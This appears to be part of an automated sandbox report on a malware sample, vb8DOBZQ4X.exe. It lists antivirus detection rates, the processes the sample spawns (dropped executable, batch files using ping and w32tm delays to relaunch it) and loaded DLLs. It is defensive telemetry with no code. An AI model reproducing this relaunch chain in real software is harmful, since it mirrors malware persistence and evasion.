Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: vb8DOBZQ4X.exe	ReversingLabs: Detection: 71%
Source: vb8DOBZQ4X.exe	Virustotal: Detection: 58%

Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe

File read: C:\Users\user\Desktop\vb8DOBZQ4X.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\vb8DOBZQ4X.exe "C:\Users\user\Desktop\vb8DOBZQ4X.exe"
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\tzbRZhAhjd.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qgs8WdcQ4J.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\HSh65PBXsw.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1dc23k5BXS.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZLKnXXaim4.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\dvHErHhaAz.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\EAk7xcglkE.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZxWzsCgC4b.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\xtlNdaBxkU.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\V20VgTPM9z.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\PING.EXE	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\tzbRZhAhjd.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qgs8WdcQ4J.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\HSh65PBXsw.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1dc23k5BXS.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZLKnXXaim4.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\dvHErHhaAz.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\EAk7xcglkE.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZxWzsCgC4b.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\xtlNdaBxkU.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe "C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\V20VgTPM9z.bat"
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: srvcli.dll	Jump to behavior
